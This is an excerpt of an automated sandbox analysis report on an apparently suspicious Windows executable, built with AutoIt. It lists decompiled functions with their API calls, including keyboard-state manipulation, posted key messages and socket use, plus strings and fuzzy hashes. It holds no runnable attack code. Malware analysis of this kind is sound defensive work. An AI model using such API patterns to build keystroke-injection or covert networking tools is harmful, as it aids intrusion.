                                                      • Opcode Fuzzy Hash: 1bae4597dd4ae8c5528974e19327261af84e3ed49cc63cb8b09127e2a580be1a
                                                      • Instruction Fuzzy Hash: 1E31A972201218BBEB208F14CC8AFEB3BA9EF49721F044155FE089A291C6B58C40DBA0
                                                      Function 00F85622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 34f3c89f6f2590ac09f53c993035ac67775a53e5c1d14bed37bf7bca2fbcd749
                                                      • Instruction ID: 6e34397edcad331dda5a0508aa5f28621cf791fc9b76ca1ba952a74946331bcd
                                                      • Opcode Fuzzy Hash: 34f3c89f6f2590ac09f53c993035ac67775a53e5c1d14bed37bf7bca2fbcd749
                                                      • Instruction Fuzzy Hash: 3C21F9B2A50A0977D6147921CD82FFB375CBF20B94F444020FD059A581F724EE54B7A6
                                                      Function 00FA4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      • Opcode ID: 5536e0f938dad383997eb248b5f08d8824e09772d0d3bee4c5cbe550251450a7
                                                      • Instruction ID: a6fe33ddce6d216d369128ea3710a75ec6c91ddc67711906f1d3368fe98667f8
                                                      • Opcode Fuzzy Hash: 5536e0f938dad383997eb248b5f08d8824e09772d0d3bee4c5cbe550251450a7
                                                      • Instruction Fuzzy Hash: 2DD1B1B1E0070AAFDF10CFA8C880BAEB7B5BF49754F148069E915AB281E770DD45DB90
                                                      Function 00F61522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00F617FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00F615CE
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F61651
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00F617FB,?,00F617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F616E4
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F616FB
                                                        • Part of subcall function 00F53820: RtlAllocateHeap.NTDLL(00000000,?,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6,?,00F21129), ref: 00F53852
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00F617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F61777
                                                      • __freea.LIBCMT ref: 00F617A2
                                                      • __freea.LIBCMT ref: 00F617AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                      • String ID:
                                                      • API String ID: 2829977744-0
                                                      • Opcode ID: a7cb26b7bae18076865b8cdc3bc886a505af6b9628881ff1fd25b60d072dff49
                                                      • Instruction ID: d876ace07b07957e6fd595c1db5afebdeb621443886e668bcbe1982da0bd888f
                                                      • Opcode Fuzzy Hash: a7cb26b7bae18076865b8cdc3bc886a505af6b9628881ff1fd25b60d072dff49
                                                      • Instruction Fuzzy Hash: 0D91B372E002169BDF208E74CC91AEEBBB5BF49720F1C4659E902E7191DB35DD44EBA0
                                                      Function 00FA4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2610073882-625585964
                                                      • Opcode ID: 72d24f38f5d53e50b36fe0ed9a5dd799ab4ae9a1947d0eef2471046fc2c1f5b9
                                                      • Instruction ID: a8bbb61db811e8a3aa1e0e6a7b39cd190284759ca4ec74058c6da436d69cd4f8
                                                      • Opcode Fuzzy Hash: 72d24f38f5d53e50b36fe0ed9a5dd799ab4ae9a1947d0eef2471046fc2c1f5b9
                                                      • Instruction Fuzzy Hash: 059182B1E00255ABDF20CFA5DC44FAEB7B8EF86720F108559F505AB281D7B0A945DFA0
                                                      Function 00F91187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00F9125C
                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F91284
                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00F912A8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F912D8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F9135F
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F913C4
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F91430
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                      • String ID:
                                                      • API String ID: 2550207440-0
                                                      • Opcode ID: 3f3314c7092520cc49d507491b35b00d35c1ce873f90cd7de8671dc6f8307fa9
                                                      • Instruction ID: 3ba0907d0ad6502d9f6c75a40bacd036d5dc7128b7b0cb18693e288577873f3e
                                                      • Opcode Fuzzy Hash: 3f3314c7092520cc49d507491b35b00d35c1ce873f90cd7de8671dc6f8307fa9
                                                      • Instruction Fuzzy Hash: 1991D276E0021AAFEF00DF98C884BBE77B5FF45325F104129E900EB291D778A945EB90
                                                      Function 00F3948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 0e19bc8e7dd12e79496b2c46a87be79bff06aefb8471eaedc5554795737c9067
                                                      • Instruction ID: 61d6356da7234add7dd521833349f9c6e34ecb6ab2fd504406728ac857dcea20
                                                      • Opcode Fuzzy Hash: 0e19bc8e7dd12e79496b2c46a87be79bff06aefb8471eaedc5554795737c9067
                                                      • Instruction Fuzzy Hash: 91911671D04219AFCB50DFA9CC84AEEBBB8FF49320F148159E515B7251D3B8A981EF60
                                                      Function 00FA3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00FA396B
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FA3A7A
                                                      • _wcslen.LIBCMT ref: 00FA3A8A
                                                      • VariantClear.OLEAUT32(?), ref: 00FA3C1F
                                                        • Part of subcall function 00F90CDF: VariantInit.OLEAUT32(00000000), ref: 00F90D1F
                                                        • Part of subcall function 00F90CDF: VariantCopy.OLEAUT32(?,?), ref: 00F90D28
                                                        • Part of subcall function 00F90CDF: VariantClear.OLEAUT32(?), ref: 00F90D34
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4137639002-1221869570
                                                      • Opcode ID: 116c2efca427055300778adefc8a684bf16f1d9b0bf7258ed725bf92561e80a0
                                                      • Instruction ID: 989dc5a5ef26efe7329ccec167432f0dc6d259084726a42edeeeb108cfc74150
                                                      • Opcode Fuzzy Hash: 116c2efca427055300778adefc8a684bf16f1d9b0bf7258ed725bf92561e80a0
                                                      • Instruction Fuzzy Hash: BF917BB5A083059FC700EF24C88196AB7E5FF89314F14892DF8899B351DB34EE05EB92
                                                      Function 00FA4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F8000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?,?,00F8035E), ref: 00F8002B
                                                        • Part of subcall function 00F8000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?), ref: 00F80046
                                                        • Part of subcall function 00F8000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?), ref: 00F80054
                                                        • Part of subcall function 00F8000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?), ref: 00F80064
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00FA4C51
                                                      • _wcslen.LIBCMT ref: 00FA4D59
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00FA4DCF
                                                      • CoTaskMemFree.OLE32(?), ref: 00FA4DDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 614568839-2785691316
                                                      • Opcode ID: 78b7595d71620629816f35a45f18f7abc28a27d649e6f434ac69d64d7a48b83a
                                                      • Instruction ID: 7a055e75bd1f630158c25cae3f875e2641b0e73b7ae0b19b245c76094e162721
                                                      • Opcode Fuzzy Hash: 78b7595d71620629816f35a45f18f7abc28a27d649e6f434ac69d64d7a48b83a
                                                      • Instruction Fuzzy Hash: 4C9139B1D0022D9FDF14DFA4DC90AEEB7B8BF49310F108169E915A7251DB74AA44EFA0
                                                      Function 00FB20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 00FB2183
                                                      • GetMenuItemCount.USER32(00000000), ref: 00FB21B5
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FB21DD
                                                      • _wcslen.LIBCMT ref: 00FB2213
                                                      • GetMenuItemID.USER32(?,?), ref: 00FB224D
                                                      • GetSubMenu.USER32(?,?), ref: 00FB225B
                                                        • Part of subcall function 00F83A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F83A57
                                                        • Part of subcall function 00F83A3D: GetCurrentThreadId.KERNEL32 ref: 00F83A5E
                                                        • Part of subcall function 00F83A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F825B3), ref: 00F83A65
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FB22E3
                                                        • Part of subcall function 00F8E97B: Sleep.KERNEL32 ref: 00F8E9F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 4196846111-0
                                                      • Opcode ID: 65c4e2819e225d4455a07accf842ff6062dffe76c2f62d00eba24b404bd890b4
                                                      • Instruction ID: fac00a8d1703373a054e41b50d113b52d196ea6f4b7ad082e990822664c50d77
                                                      • Opcode Fuzzy Hash: 65c4e2819e225d4455a07accf842ff6062dffe76c2f62d00eba24b404bd890b4
                                                      • Instruction Fuzzy Hash: 0A716E75E00215AFCB50EF69C885AEEB7F5EF48320F148459E816EB351D738AE41AF90
                                                      Function 00F8AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00F8AEF9
                                                      • GetKeyboardState.USER32(?), ref: 00F8AF0E
                                                      • SetKeyboardState.USER32(?), ref: 00F8AF6F
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F8AF9D
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F8AFBC
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F8AFFD
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F8B020
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 8ca521d2b5f686624c9a372710205fbd06fbbee7ae04de958e2df6365811113c
                                                      • Instruction ID: 45be3414e757e9c37292de62958f3adfd76fe19a41ec05daadabbc0cb5844179
                                                      • Opcode Fuzzy Hash: 8ca521d2b5f686624c9a372710205fbd06fbbee7ae04de958e2df6365811113c
                                                      • Instruction Fuzzy Hash: 1151E3A0A047D53DFB3762348C45BFBBEA99B06314F08858AE2E9554C2D3D8ACD4E751
                                                      Function 00F8ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00F8AD19
                                                      • GetKeyboardState.USER32(?), ref: 00F8AD2E
                                                      • SetKeyboardState.USER32(?), ref: 00F8AD8F
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F8ADBB
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F8ADD8
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F8AE17
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F8AE38
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: b844c0bbb71569e80781d3b68fb989c9e05b4ed43f7ce7e2ca1d4c69c434cb97
                                                      • Instruction ID: 34885b06fbcf083384da7572499d02d5de70015cd12dde3166a433974d20cd58
                                                      • Opcode Fuzzy Hash: b844c0bbb71569e80781d3b68fb989c9e05b4ed43f7ce7e2ca1d4c69c434cb97
                                                      • Instruction Fuzzy Hash: F65118A1D047D53DFB33A3348C95BFABE999B06311F08898AE1D5868C2D394EC94F752
                                                      Function 00F5542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(00F63CD6,?,?,?,?,?,?,?,?,00F55BA3,?,?,00F63CD6,?,?), ref: 00F55470
                                                      • __fassign.LIBCMT ref: 00F554EB
                                                      • __fassign.LIBCMT ref: 00F55506
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00F63CD6,00000005,00000000,00000000), ref: 00F5552C
                                                      • WriteFile.KERNEL32(?,00F63CD6,00000000,00F55BA3,00000000,?,?,?,?,?,?,?,?,?,00F55BA3,?), ref: 00F5554B
                                                      • WriteFile.KERNEL32(?,?,00000001,00F55BA3,00000000,?,?,?,?,?,?,?,?,?,00F55BA3,?), ref: 00F55584
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: 815defb9dfe8ec7b0474f7d28e5347a71f2e871aaff21fb99faaf799c4d79a93
                                                      • Instruction ID: 8a30e905d5de38d5cf74942393ad18b705a285ebb03fa26b5e29bda2750bab9e
                                                      • Opcode Fuzzy Hash: 815defb9dfe8ec7b0474f7d28e5347a71f2e871aaff21fb99faaf799c4d79a93
                                                      • Instruction Fuzzy Hash: 0151F5B1D006099FCB10CFA8DC91AEEBBF9EF08711F18411AFA55E7291E7309A45DB60
                                                      Function 00F42D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 00F42D4B
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00F42D53
                                                      • _ValidateLocalCookies.LIBCMT ref: 00F42DE1
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F42E0C
                                                      • _ValidateLocalCookies.LIBCMT ref: 00F42E61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: a8c335a1edc4f21490f4dd89f0b5c992219fa7a09bd5deee5921069ca42d1f71
                                                      • Instruction ID: e3a14560aad25465b9a90ad0420d2ab3adc76b6d4f00873050caa18974a9feb2
                                                      • Opcode Fuzzy Hash: a8c335a1edc4f21490f4dd89f0b5c992219fa7a09bd5deee5921069ca42d1f71
                                                      • Instruction Fuzzy Hash: AD41AB35E00209ABCF10DF68CC85A9EBFB5BF44324F548165FD15AB292DB35AA01EB90
                                                      Function 00FA10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FA304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FA307A
                                                        • Part of subcall function 00FA304E: _wcslen.LIBCMT ref: 00FA309B
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00FA1112
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1121
                                                      • WSAGetLastError.WSOCK32 ref: 00FA11C9
                                                      • closesocket.WSOCK32(00000000), ref: 00FA11F9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 2675159561-0
                                                      • Opcode ID: c19c3c952873216ede1c91be443b10adec0b248140a4853283c1a8f0beb040a9
                                                      • Instruction ID: 8226c10fed5b801eb9e87ada48c38bd34a966333c0f05c9775c6c6c6a73fb96a
                                                      • Opcode Fuzzy Hash: c19c3c952873216ede1c91be443b10adec0b248140a4853283c1a8f0beb040a9
                                                      • Instruction Fuzzy Hash: 67410FB1600218AFDB109F24CC84BAABBE9FF46324F158159F9099F291C774ED41DBE0
                                                      Function 00F8CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
